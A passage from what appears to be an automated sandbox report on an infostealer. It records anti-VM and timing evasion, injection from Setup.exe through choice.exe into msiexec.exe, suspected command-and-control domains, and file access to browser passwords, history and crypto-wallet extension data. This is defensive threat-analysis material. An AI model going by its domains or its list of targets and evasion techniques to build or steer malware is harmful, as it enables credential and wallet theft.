          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeAPI/Special instruction interceptor: Address: 76F17C44
          Source: C:\Users\user\Desktop\Setup.exeAPI/Special instruction interceptor: Address: 76F17945
          Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 76F13B54
          Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 23BC87
          Source: C:\Users\user\Desktop\Setup.exeRDTSC instruction interceptor: First address: 76F1F3E1 second address: 76F1F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\Setup.exeRDTSC instruction interceptor: First address: 76F1F3FD second address: 76F1F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FC08111F045h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FC08111F0D0h 0x00000031 rdtsc
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA9AE8 rdtscp 12_3_09CA9AE8
          Source: C:\Windows\SysWOW64\choice.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cbaxoydiJump to dropped file
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6632Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0619855F FindFirstFileExW,5_2_0619855F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015447DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_015447DD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_0154210D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_0154210D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015448E5 FindFirstFileA,GetLastError,12_2_015448E5
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696584680t
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
          Source: 7LUEA3.pif, 7LUEA3.pif, 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1584447675.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1644199350.0000000001566000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1644199350.000000000158B000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1642596205.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1584447675.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1724067337.00000000034CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696584680s
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
          Source: InstallUtil.exe, 0000000F.00000002.2490650779.000000000102D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696584680x
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696584680t
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
          Source: choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
          Source: 7LUEA3.pif, 0000000C.00000003.1584447675.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
          Source: msiexec.exe, 00000005.00000003.1327603522.000000000650D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696584680p
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696584680o
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR]
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696584680f
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696584680j
          Source: msiexec.exe, 00000005.00000003.1327888406.00000000065E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
          Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_5-26939
          Source: C:\Users\user\Desktop\Setup.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA9AE8 rdtscp 12_3_09CA9AE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00319510 LdrInitializeThunk,5_2_00319510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188BA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_06188BA5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559BED VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,12_2_01559BED
          Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_008EE18A mov eax, dword ptr fs:[00000030h]0_2_008EE18A
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01565226 mov eax, dword ptr fs:[00000030h]12_2_01565226
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015533CD mov eax, dword ptr fs:[00000030h]12_2_015533CD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B2 mov eax, dword ptr fs:[00000030h]12_2_015592B2
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B9 mov eax, dword ptr fs:[00000030h]12_2_015592B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01543E9D mov eax, dword ptr fs:[00000030h]12_2_01543E9D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061993CA GetProcessHeap,5_2_061993CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188D32 SetUnhandledExceptionFilter,5_2_06188D32
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188BA5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_06188BA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0618E07D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0618E07D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188930 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_06188930
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifMemory protected: page write copy | page execute and write copy | page guard | page no cacheJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Setup.exeNtSetInformationThread: Direct from: 0x8EEE2BJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeNtQuerySystemInformation: Direct from: 0x776D7B2EJump to behavior
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: faintbl0w.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 300snails.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xc1aimbl0w.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: thicktoys.sbs
          Source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sliperyedhby.icu
          Source: C:\Users\user\Desktop\Setup.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 239330Jump to behavior
          Source: C:\Windows\SysWOW64\choice.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 309A008Jump to behavior
          Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\choice.exe C:\Windows\SysWOW64\choice.exeJump to behavior
          Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
          Source: 7LUEA3.pif, 0000000C.00000003.1614534646.0000000009312000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099B1000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1603850920.00000000098CA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_06194678
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_0619B790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B417
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B4B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_0619B53D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0619BA95
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_0619B3CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0619B8B9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_0619B120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: GetLocaleInfoW,5_2_0619B9BF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: EnumSystemLocalesW,5_2_061941A9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_015422E5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,12_2_015423EF
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_01547269
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_015472B5
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,GetACP,12_2_01548801
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: GetLocaleInfoA,12_2_01542C09
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
          Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dfc85a81 VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_06188D9C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_06188D9C
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01548245 GetVersionExA,12_2_01548245
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
          Source: msiexec.exe, 00000005.00000003.1341089958.00000000035BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: msiexec.exe, 00000005.00000003.1385076986.000000000358B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: msiexec.exe, 00000005.00000003.1385312815.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: msiexec.exe, 00000005.00000003.1385312815.0000000003578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\places.sqliteJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.dbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.jsonJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
